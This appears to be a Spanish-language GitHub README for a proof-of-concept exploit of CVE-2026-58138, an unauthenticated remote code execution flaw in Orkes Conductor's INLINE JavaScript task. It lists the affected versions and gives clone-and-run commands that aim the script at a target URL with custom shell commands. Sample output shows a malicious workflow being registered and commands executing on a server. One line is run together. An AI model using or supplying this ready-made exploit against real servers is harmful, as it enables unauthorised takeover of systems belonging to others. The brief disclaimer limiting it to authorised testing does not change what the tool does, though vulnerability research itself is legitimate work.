
CVE-2026-58138 - Conductor (3.21.21..<3.30.2) RCE sin autenticación mediante el evaluador INLINE de GraalVM
Vulnerabilidad crítica de ejecución remota de código en Orkes Conductor
CVE-2026-58138 es una vulnerabilidad crítica de ejecución remota de código (RCE) no autenticada que afecta a Orkes Conductor en las versiones 3.21.21 hasta 3.30.1. Esta vulnerabilidad permite a los atacantes ejecutar comandos arbitrarios en el servidor de Conductor sin requerir autenticación alguna, lo que puede provocar un compromiso total del sistema.
La vulnerabilidad existe en el tipo de tarea INLINE dentro del motor de flujos de trabajo de Orkes Conductor. La tarea INLINE admite la evaluación de JavaScript con acceso a objetos Java mediante eval, lo que permite a un atacante:
INLINE con código JavaScriptjava.lang.Runtime.exec()| Rango de Versiones | Estado |
|---|---|
| 3.21.21 - 3.30.1 | ✅ Vulnerable |
| > 3.30.1 | ❌ Parcheada |
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138
# Make the script executable
chmod +x CVE-2026-58138.py
# Verify installation
python3 CVE-2026-58138.py --help
# Basic usage
python3 CVE-2026-58138.py http://target:8080
# Custom command
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC
[*] target = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12
3.30.2 o posteriorSolo con fines educativos y de investigación en seguridad. Úselo únicamente en sistemas de su propiedad o para los que tenga permiso explícito de prueba.
⭐ ¿Te resultó útil? ¡Dale una estrella en GitHub! ⭐